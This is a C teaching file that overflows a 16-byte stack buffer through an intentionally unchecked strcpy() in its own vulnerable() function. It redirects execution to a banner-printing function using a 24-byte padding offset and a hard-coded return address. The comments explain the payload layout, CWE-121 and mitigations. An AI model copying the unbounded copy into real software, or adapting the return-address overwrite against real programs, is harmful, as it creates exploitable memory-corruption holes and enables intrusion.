/**
* my_exploit.c - WORKING EXPLOIT for YOUR system
* Your offset: 24 bytes
* Your target address: 0x401530
*/
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
// UPDATE THIS LINE WITH YOUR OFFSET (from debug output)
#define OFFSET 24 // ? YOUR OFFSET GOES HERE (you have 24)
/*
 * Demonstration target.  main() never calls this directly; it only runs
 * when the saved return address of vulnerable() has been replaced with
 * its address.  Prints a banner and terminates the process with status 0
 * instead of returning, since there is no sane caller frame to go back to.
 */
void secret_function() {
    static const char *const banner[] = {
        "\n",
        "+--------------------------------------------------------------+\n",
        "¦ ?????? SUCCESS! EXECUTION HIJACKED! ?????? ¦\n",
        "¦ ¦\n",
        "¦ Buffer overflow worked! ¦\n",
    };
    for (size_t line = 0; line < sizeof banner / sizeof banner[0]; line++) {
        fputs(banner[line], stdout);
    }
    printf("¦ Offset used: %d bytes ¦\n", OFFSET);
    fputs("+--------------------------------------------------------------+\n", stdout);
    fputs("\n", stdout);
    /* Never return: the frame we were "called" from is corrupted. */
    exit(0);
}
/*
 * Legitimate continuation of main().  Its output means vulnerable()
 * returned to where it was called from, i.e. the return address was
 * not redirected.
 */
void normal_function() {
    fputs(" This should NOT print if exploit works!\n", stdout);
}
/*
 * Intentionally unsafe copy; this is the function the demonstration targets.
 *
 * @param input  NUL-terminated string of arbitrary length.  Nothing here
 *               checks it against the size of buffer.
 *
 * strcpy() writes every byte of input up to its terminator into a 16-byte
 * automatic array, so anything longer than 15 characters overruns the
 * array and overwrites whatever the compiler placed after it in this frame
 * (main() assumes the saved frame pointer and then the return address, at
 * OFFSET bytes).  That is undefined behaviour (CWE-121): the exact layout is
 * compiler- and flag-dependent, which is why OFFSET has to be measured per
 * build.  Any of a bounded copy (snprintf(buffer, sizeof buffer, "%s",
 * input)), a stack canary, or _FORTIFY_SOURCE's size-checked strcpy would
 * stop the overrun before the function returns.
 */
void vulnerable(char *input) {
char buffer[16]; // 16 bytes on the stack; its size is never compared with strlen(input)
printf("\n Copying input to buffer...\n");
strcpy(buffer, input); // VULNERABLE! unbounded write: copies until input's NUL, not until buffer is full
printf(" Returning from vulnerable...\n"); // the return after this uses whatever now sits in the return-address slot
}
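/*
 * Builds the overflow payload and passes it to vulnerable().
 *
 * Payload layout (OFFSET is the macro at the top of the file):
 *   [OFFSET bytes of 'A'] [sizeof addr bytes of addr, host byte order] ['\0']
 * The 'A' run covers buffer[] plus whatever lies between it and the saved
 * return address; the bytes of addr then land on that return address.
 *
 * This only works on the system the values were measured on.  It assumes a
 * little-endian host where sizeof(unsigned long) equals the width of a saved
 * return address (x86-64 Linux; not LLP64 targets) -- confirm before reuse --
 * and a binary loaded at a fixed address, otherwise 0x401530 is stale.
 * Note that strcpy() in vulnerable() stops at the first NUL byte of addr, so
 * strlen(payload) is smaller than the OFFSET + sizeof addr bytes built here;
 * the reported "Payload size" is the number of bytes strcpy() will copy.
 *
 * Returns 0 when vulnerable() returns normally (no hijack), EXIT_FAILURE when
 * OFFSET no longer fits the payload buffer, and does not return at all when
 * secret_function() is reached, because that function calls exit(0).
 */
int main(void) {
    printf("\n");
    printf("+--------------------------------------------------------------+\n");
    printf("¦ BUFFER OVERFLOW EXPLOIT ¦\n");
    printf("¦ Using offset: %d bytes ¦\n", OFFSET);
    printf("+--------------------------------------------------------------+\n");

    // Target address from your debug output
    unsigned long addr = 0x401530; // ? YOUR TARGET ADDRESS
    printf("\n Target address: 0x%lx\n", addr);

    char payload[200];
    // OFFSET is hand-edited; refuse to build a payload that would overrun
    // payload[] itself (padding + address + terminator must fit).
    const size_t payload_len = OFFSET + sizeof addr;
    if (payload_len + 1 > sizeof payload) {
        fprintf(stderr, " OFFSET %d does not fit the %zu-byte payload buffer\n",
                OFFSET, sizeof payload);
        return EXIT_FAILURE;
    }

    // Step 1: padding up to the saved return address (buffer + frame pointer)
    memset(payload, 'A', OFFSET);
    // Step 2: the replacement return address, copied in host byte order
    memcpy(payload + OFFSET, &addr, sizeof addr);
    // Step 3: terminator so strcpy() in vulnerable() knows where to stop
    payload[payload_len] = '\0';
    // strlen() counts only up to the first NUL inside addr, so this is the
    // number of bytes strcpy() will actually transfer, not payload_len.
    printf(" Payload size: %zu bytes\n", strlen(payload));
    printf("\n ?? Launching exploit...\n");

    // Execute the exploit
    vulnerable(payload);

    // Reaching this point means the return address was not redirected.
    printf("\n ? If you see this, exploit failed\n");
    normal_function();
    return 0;
}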